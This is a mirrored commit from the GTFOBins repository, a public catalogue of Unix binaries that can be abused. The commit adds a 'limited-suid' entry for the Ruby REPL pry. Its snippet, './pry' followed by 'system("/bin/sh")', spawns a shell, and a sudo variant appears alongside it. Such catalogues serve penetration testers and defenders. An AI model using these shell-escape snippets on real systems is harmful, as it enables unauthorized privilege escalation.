1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add limited-suid to pry

This commit is contained in:
Andrea Cardaci 2020-03-17 20:48:08 +01:00
parent ec91e7b417
commit 662994aca8

View File

@ -8,4 +8,8 @@ functions:
- code: |
sudo pry
system("/bin/sh")
limited-suid:
- code: |
./pry
system("/bin/sh")
---